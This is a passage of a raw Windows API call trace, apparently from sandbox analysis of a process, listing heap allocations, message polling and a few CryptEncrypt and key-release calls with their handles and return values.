lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d85c0 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.423] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x131aa, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x131b0) returned 1 [0200.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.423] CharLowerBuffW (in: lpsz="byte[78256]", cchLength=0xb | out: lpsz="byte[78256]") returned 0xb [0200.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.424] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.424] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.424] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.424] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.425] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.425] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.425] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d85c0*, pdwDataLen=0x8bef68*=0x131aa, dwBufLen=0x131b0 | out: pbData=0x34d85c0*, pdwDataLen=0x8bef68*=0x131b0) returned 1 [0200.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.427] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.427] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.427] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.427] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.427] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.427] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.427] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.427] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.427] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.427] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.427] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.427] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.427] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.427] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.427] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.428] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.428] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.428] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.428] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.428] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.435] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.435] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0200.435] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.435] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0200.435] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.435] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.435] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.435] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.435] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.435] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.435] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.435] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0200.436] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.436] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.436] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.436] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.436] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.436] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.436] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.436] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.436] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.436] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.436] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.436] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.436] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.436] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.436] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.437] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.437] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.437] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.437] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.437] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.437] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.437] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.437] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.437] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.437] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.437] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.438] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.438] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.438] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.438] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.438] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.438] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.438] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.438] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.438] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.438] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.438] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.438] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.438] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.438] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.439] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.439] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.439] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.439] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.439] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.439] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.439] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.439] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.439] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.439] CryptReleaseContext (hProv=0xad63f8, dwFlags=0x0) returned 1 [0200.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0200.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0200.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 